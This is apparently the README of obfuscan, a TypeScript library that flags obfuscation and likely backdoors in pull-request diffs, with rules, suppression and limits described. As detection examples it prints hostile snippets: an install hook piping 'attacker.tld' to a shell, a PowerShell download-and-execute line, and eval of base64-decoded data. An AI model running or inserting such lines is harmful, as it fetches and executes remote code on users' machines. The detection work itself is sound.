@obfuscan/core
v0.1.0
obfuscan
Detect obfuscated code and likely backdoors in pull-request diffs. Multi-language. Embeddable. Diff-aware. Pure TypeScript.
What it does
obfuscan reads a unified diff (or an explicit file list) and returns findings that flag the two patterns nearly every supply-chain attack relies on:
- Obfuscation: code deliberately hard for a human to read, such as high-entropy string blobs, encoded payload arrays, bidi/homoglyph identifiers, and machine-generated identifier names.
- Dynamic / install-time execution: code with the means to run attacker-controlled bytes, such as eval, Function, Invoke-Expression, pickle.loads, Reflection.Assembly.Load, postinstall hooks, curl … | sh, etc.
When the two combine — a decoder feeding a sink — that's the highest-precision malware shape across every language we've tested. obfuscan flags it.
$ obfuscan scan diff.patch
src/loader.ts:42:0 BLOCK [obf.decode-then-exec.typescript]
Decoded data is being executed via a dynamic sink.
> eval(Buffer.from(_0x4f3a[1], 'base64').toString())
src/loader.ts:11:0 WARN [obf.encoded-array-fingerprint]
Found 40 encoded-looking string literals (100% of literals).
package.json:23:5 BLOCK [obf.manifest-install-script]
postinstall hook fetches a URL and pipes the result to a shell.
3 findings · 2 block · 1 warn
Why
Existing tools each cover a slice:
- Semgrep — generic AST patterns, but no entropy/data-flow and not focused on obfuscation.
- Bandit / njsscan — single-language.
- Apiiro PRevent — Python runtime, GitHub-Action-shaped, not a library.
- Datadog GuardDog — scans published packages, not PRs.
- Socket.dev / Snyk — closed source SaaS.
The gap obfuscan fills: a TypeScript-native, embeddable, multi-language, diff-aware detector. Drop it into any Node tool — a Git client, a Husky hook, a VS Code extension, a custom GitHub Action, a CI script — and get findings on the lines that actually changed.
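As a rough illustration of the CI-script case, the sketch below turns a list of findings into an exit code. The `Finding` shape uses only the fields shown elsewhere in this README (`file`, `line`, `severity`, `ruleId`, `reason`); the `gate` helper is hypothetical and not part of @obfuscan/core.

```typescript
// Shape of a finding, limited to the fields this README uses.
interface Finding {
  file: string;
  line: number;
  severity: "info" | "warn" | "block";
  ruleId: string;
  reason: string;
}

// Hypothetical helper (not an obfuscan API): format blocking findings and
// pick an exit code suitable for a CI step or a pre-commit hook.
function gate(findings: Finding[]): { exitCode: number; lines: string[] } {
  const lines = findings
    .filter((f) => f.severity === "block")
    .map((f) => `${f.file}:${f.line} BLOCK [${f.ruleId}] ${f.reason}`);
  return { exitCode: lines.length > 0 ? 1 : 0, lines };
}

// In a host script the wiring would look roughly like this:
//   const result = await scan({ diff }, { fileResolver });
//   const { exitCode, lines } = gate(result.findings);
//   lines.forEach((l) => console.error(l));
//   process.exitCode = exitCode;
```

Failing only on `block` keeps `warn` findings visible without stopping the pipeline; a stricter host could widen the filter.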
Install
npm install @obfuscan/core @obfuscan/rules
# or
pnpm add @obfuscan/core @obfuscan/rules
The core package ships the engine; rules ships language configs and tree-sitter query assets, not parser grammars. Hosts that want parser-backed custom detectors provide their own grammars via RuleSet.loadGrammar() / GrammarHandle.parse(). We use SemVer for the engine and CalVer (2026.04.0) for the rules.
Using @obfuscan/rules
@obfuscan/core loads language configs from @obfuscan/rules by default, so normal usage is just installing both packages.
import { scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const result = await scan(
{ diff: await fs.readFile("pr.diff", "utf8") },
{ fileResolver: (p) => fs.readFile(p, "utf8") },
);
You can also load a custom rules directory:
import { loadRuleSet, scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const rules = await loadRuleSet({
languageDir: "./my-rules/languages",
queryDir: "./my-rules/queries",
});
const result = await scan(
{ paths: ["src/file.ts"] },
{
fileResolver: (p) => fs.readFile(p, "utf8"),
rules,
},
);
Notes:
- @obfuscan/core uses SemVer.
- @obfuscan/rules uses CalVer (YYYY.MM.PATCH) and can update independently.
- Rule config schema: packages/rules/languages/_schema.json
Quick start
Library
import { scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const result = await scan(
{ diff: await fs.readFile("pr.diff", "utf8") },
{ fileResolver: (path) => fs.readFile(path, "utf8") },
);
for (const f of result.findings) {
if (f.severity === "block") {
console.error(`${f.file}:${f.line} BLOCK [${f.ruleId}] ${f.reason}`);
}
}
What it catches (with real examples)
- Decode-then-execute, the canonical malware shape:
  eval(Buffer.from(_0x4f3a[1], 'base64').toString())
- String-array obfuscator output (verbatim from the 2026 axios compromise):
  var _0x4f3a = ['dGVzdA==', 'aGVsbG8=', /* …128 more… */];
- PowerShell network-then-exec droppers:
  IEX (New-Object Net.WebClient).DownloadString($url)
- curl | sh in install hooks:
  "postinstall": "curl https://attacker.tld/x | sh"
- Trojan Source bidi attacks (any language with Unicode source).
- Pickle / Marshal / unserialize on untrusted input.
- setup.py top-level imperative code that fetches and executes at install time.
- build.rs with suspicious network behavior.
- Homoglyph identifiers (Latin/Cyrillic mixing).
The detector list is in docs/detectors.md. See docs/coverage.md for per-language coverage.
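To make the decode-then-execute shape concrete, here is a deliberately naive, single-line sketch: it reports a line when a decoder call appears after a dynamic sink's opening parenthesis. The regexes and the function name are assumptions made for illustration. This is not how obfuscan's detectors are implemented, and a real detector has to handle multi-line flows and many more sinks and decoders.

```typescript
// Dynamic sinks: eval(...) and Function(...) / new Function(...).
const SINK = /\b(?:eval|Function)\s*\(/;

// Decoders: atob(...) or Buffer.from(<anything>, 'base64' | 'hex').
const DECODER =
  /\batob\s*\(|Buffer\.from\s*\([^)]*,\s*['"](?:base64|hex)['"]\s*\)/;

// Hypothetical check: true when a decoder call appears after the sink's
// opening parenthesis on the same line.
function looksLikeDecodeThenExec(line: string): boolean {
  const sink = SINK.exec(line);
  if (!sink) return false;
  const afterSink = line.slice(sink.index + sink[0].length);
  return DECODER.test(afterSink);
}
```

Applied to the first example in the list above, the check returns true; a plain `eval("1+1")` or a standalone `Buffer.from(x, 'base64')` does not trigger it, since each has only one half of the pattern.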
Language coverage
Universal detectors run on any readable text file.
Language-aware detectors are currently implemented for:
- Tier 1: JavaScript, TypeScript, Python, PowerShell, Bash, PHP, Ruby
- Tier 2: Go, Rust, C#, Java, Kotlin, Lua, Perl, VBScript
Path-based manifest detectors currently target package.json, setup.py, build.rs, GitHub Actions workflows, and Dockerfile.
See docs/coverage.md for the up-to-date matrix by rule and language.
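A universal check needs no parser at all. The sketch below looks for bidirectional control characters and for identifier-like tokens that mix Latin and Cyrillic letters. The function names and the returned labels are hypothetical, chosen for this example, and are not obfuscan rule ids.

```typescript
// Bidirectional controls used in Trojan Source attacks:
// U+202A..U+202E (embeddings and overrides), U+2066..U+2069 (isolates).
const BIDI_CONTROLS = /[\u202A-\u202E\u2066-\u2069]/;

// Unicode property escapes need the "u" flag; the RegExp constructor is used
// so the example does not depend on the compiler's target setting.
const LATIN = new RegExp("\\p{Script=Latin}", "u");
const CYRILLIC = new RegExp("\\p{Script=Cyrillic}", "u");
const NON_IDENTIFIER = new RegExp("[^\\p{L}\\p{N}_$]+", "u");

function mixesLatinAndCyrillic(token: string): boolean {
  return LATIN.test(token) && CYRILLIC.test(token);
}

// Hypothetical line scanner returning illustrative labels.
function scanLine(line: string): string[] {
  const hits: string[] = [];
  if (BIDI_CONTROLS.test(line)) hits.push("bidi-control");
  const tokens = line.split(NON_IDENTIFIER).filter(Boolean);
  if (tokens.some(mixesLatinAndCyrillic)) hits.push("mixed-script-identifier");
  return hits;
}
```

Mixed-script checks are noisy in codebases that legitimately use non-Latin identifiers, so a host would likely pair a check like this with the suppression mechanisms described later.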
How it works
obfuscan runs a layered pipeline over each file selected by diff or paths input:
input → file context → detectors → suppress/filter → sorted findings
- Layer A: universal, raw text. Shannon entropy on long literals, line length, bidi control characters and homoglyphs, encoded-string-array regex. Fires on every language.
- Layer B: language-aware heuristics. Generic detectors routed by detected language id: dynamic execution with non-literals, decode-then-exec, network-then-exec, deserializer usage, suspicious I/O clusters, and related patterns.
- Layer C: manifest/path rules. Specialized detectors for package.json, setup.py, build.rs, .github/workflows/*, and Dockerfile.
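The Layer A entropy signal can be sketched in a few lines. Shannon entropy over a string's characters is H = -Σ p(c) · log2 p(c), measured in bits per character. The length and entropy thresholds below are illustrative assumptions, not obfuscan's actual values.

```typescript
// Shannon entropy in bits per character (counted by Unicode code point).
function shannonEntropy(s: string): number {
  const chars = Array.from(s);
  if (chars.length === 0) return 0;
  const counts = new Map<string, number>();
  chars.forEach((ch) => counts.set(ch, (counts.get(ch) ?? 0) + 1));
  let bits = 0;
  counts.forEach((count) => {
    const p = count / chars.length;
    bits -= p * Math.log2(p);
  });
  return bits;
}

// Hypothetical thresholds: only long literals are considered, and only
// those whose character distribution is close to random.
function isHighEntropyLiteral(
  literal: string,
  minLength = 40,
  minBits = 4.5,
): boolean {
  return literal.length >= minLength && shannonEntropy(literal) >= minBits;
}
```

A string made of one repeated character scores 0 bits, while a string that uses 64 symbols uniformly scores 6 bits. The length floor matters because short strings give unreliable entropy estimates.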
Each detector emits findings with a 0–10 score and info / warn / block severity. Findings are then filtered (diff ranges, directives, allowlists), sorted, and returned in ScanResult.
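The diff-range filter can be pictured as follows: parse the unified diff's hunk headers, record which new-side line numbers were added in each file, and keep only findings that land on those lines. This is a minimal sketch under the assumption of git-style `+++ b/path` headers; the function names are hypothetical and the real filtering in obfuscan may differ.

```typescript
// Matches "@@ -oldStart[,oldCount] +newStart[,newCount] @@".
const HUNK_HEADER = /^@@ -\d+(?:,(\d+))? \+(\d+)(?:,(\d+))? @@/;

function addedLinesByFile(diff: string): Map<string, Set<number>> {
  const added = new Map<string, Set<number>>();
  let file: string | null = null;
  let oldLeft = 0; // old-side lines still expected in the current hunk
  let newLeft = 0; // new-side lines still expected in the current hunk
  let newLine = 0; // next new-side line number

  for (const line of diff.split(/\r?\n/)) {
    if (oldLeft > 0 || newLeft > 0) {
      // Inside a hunk body: classify by the first character.
      if (line.startsWith("\\")) continue; // "\ No newline at end of file"
      if (line.startsWith("+")) {
        if (file !== null) {
          if (!added.has(file)) added.set(file, new Set<number>());
          added.get(file)!.add(newLine);
        }
        newLine++;
        newLeft--;
      } else if (line.startsWith("-")) {
        oldLeft--;
      } else {
        // Context line: present on both sides.
        oldLeft--;
        newLeft--;
        newLine++;
      }
      continue;
    }
    if (line.startsWith("+++ ")) {
      const path = line.slice(4).split("\t")[0];
      file = path === "/dev/null" ? null : path.replace(/^b\//, "");
      continue;
    }
    const m = HUNK_HEADER.exec(line);
    if (m) {
      // An omitted count means 1 in the unified format.
      oldLeft = m[1] === undefined ? 1 : Number(m[1]);
      newLine = Number(m[2]);
      newLeft = m[3] === undefined ? 1 : Number(m[3]);
    }
  }
  return added;
}

// Keep only findings located on lines the diff added.
function onlyChanged<T extends { file: string; line: number }>(
  findings: T[],
  diff: string,
): T[] {
  const added = addedLinesByFile(diff);
  return findings.filter((f) => added.get(f.file)?.has(f.line) ?? false);
}
```

Counting lines from the hunk header, rather than scanning for `+++` or `---` prefixes, avoids misreading added or removed content that itself starts with those characters.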
Architecture details: docs/architecture.md.
Suppression
False positives are inevitable in security tooling. obfuscan ships first-class suppression:
- Path allowlist for vendored / minified / generated code.
- Per-finding suppression keyed by (ruleId, sha256(snippet)), persisted by hosts in .obfuscan/allowlist.json via loadAllowlist(), saveAllowlist(), and hashSnippet().
- In-source comment suppressions: // obfuscan-disable-next-line obf.decode-then-exec.
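The per-finding key can be illustrated with Node's built-in crypto module. The sketch below is a stand-in, not the library's hashSnippet(): the key format (`ruleId:hex`) and the absence of any snippet normalization are assumptions, and the real function and allowlist file layout may differ.

```typescript
import { createHash } from "node:crypto";

// Hypothetical key builder for the (ruleId, sha256(snippet)) pair.
function suppressionKey(ruleId: string, snippet: string): string {
  const digest = createHash("sha256").update(snippet, "utf8").digest("hex");
  return `${ruleId}:${digest}`;
}

// Hypothetical in-memory allowlist check.
function isSuppressed(
  allowlist: Set<string>,
  ruleId: string,
  snippet: string,
): boolean {
  return allowlist.has(suppressionKey(ruleId, snippet));
}
```

Keying on the snippet hash rather than on a line number means a suppression survives unrelated edits that shift the code, but stops applying as soon as the flagged snippet itself changes.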
Honest limits
- Static analysis cannot catch an attacker who engineers around it. xz is the existence proof. The goal is to raise attacker cost and surface unsophisticated attempts, not to prove malice.
- Binary blobs need a separate scanner (YARA, file-magic). obfuscan flags the metadata signal but doesn't analyze byte content.
- Compiled-language and build-system backdoors still need manual review and additional build-focused rules.
- There is no built-in LLM verifier in @obfuscan/core today.
Comparison
| | obfuscan | Semgrep | PRevent | GuardDog | Bandit |
|---|---|---|---|---|---|
| Embeddable as TS/JS library | ✓ | — | — | — | — |
| Diff/PR-aware | ✓ | partial | ✓ | — | — |
| Multi-language | ✓ (15+ deep, 60+ universal) | ✓ | ✓ (15) | ✓ (3) | — |
| Entropy / data-flow | ✓ | — | ✓ | ✓ | partial |
| Manifest detectors | ✓ | partial | ✓ | ✓ | — |
| Pure offline, no SaaS | ✓ | ✓ | ✓ | ✓ | ✓ |
| Open source | ✓ Apache-2.0 | LGPL/commercial | Apache-2.0 | Apache-2.0 | Apache-2.0 |
Project status
Pre-1.0. The detector framework, scoring, suppression, and tier-1/tier-2 language rules are stable. Breaking API changes are batched into minor releases until 1.0; rule changes ship as patch CalVer releases of @obfuscan/rules and never require an engine update.
Roadmap
- [x] Tier-1 language rules (JS/TS, Python, PowerShell, Bash, PHP, Ruby)
- [x] Manifest detectors for npm, PyPI, GitHub Actions, Dockerfile
- [x] Tier-2 language rules (Go, Rust, C#, Java, Kotlin, Lua, Perl, VBScript)
- [ ] @obfuscan/cli 1.0 with SARIF output
- [ ] @obfuscan/github-action
- [ ] @obfuscan/llm-verify optional Layer-D package
- [ ] Reproducible benchmark suite against Datadog malicious-software-packages-dataset
Contributing
Adding rules is the highest-leverage contribution. Most rule contributions are 3-line PRs to a JSON file. See CONTRIBUTING.md.
Bug reports, false-positive reports, and bypasses welcome — see SECURITY.md for how to report bypasses privately.
Acknowledgements
obfuscan's detection model is informed by published work from Apiiro (PRevent), Datadog (GuardDog, BewAIre), Phylum, Veracode, and the academic literature on entropy-based malware detection. The public taxonomy of PowerShell obfuscation comes from Daniel Bohannon's Invoke-Obfuscation. Where a specific paper or post directly informed a detector, it is cited inline in the source.
License
Apache-2.0. See LICENSE.
